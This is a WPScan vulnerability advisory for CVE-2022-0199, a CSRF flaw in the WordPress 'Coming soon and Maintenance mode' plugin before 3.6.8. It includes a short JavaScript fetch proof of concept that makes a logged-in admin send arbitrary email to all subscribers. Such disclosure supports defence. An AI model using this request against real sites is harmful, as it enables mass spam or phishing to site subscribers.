WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Coming soon and Maintenance mode < 3.6.8 - Arbitrary Email Sending to Subscribed Users via CSRF

Description

The plugin does not have CSRF check in its coming_soon_send_mail AJAX action, allowing attackers to make logged in admin to send arbitrary emails to all subscribed users via a CSRF attack

Proof of Concept

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "action=coming_soon_send_mail&massage_title=title&massage_description=description&massage_from_name=from&[email protected]",
  "method": "POST",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

coming-soon-page
Fixed in version 3.6.8

References

CVE
CVE-2022-0199
URL
https://plugins.trac.wordpress.org/changeset/2659455

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc/
Verified

Yes

WPVDB ID
1ab1748f-c939-4953-83fc-9df878da7714

Timeline

Publicly Published

2022-01-24 (about 3 months ago)

Added

2022-01-24 (about 3 months ago)

Last Updated

2022-04-12 (about 1 months ago)

Our Other Services

WPScan WordPress Security Plugin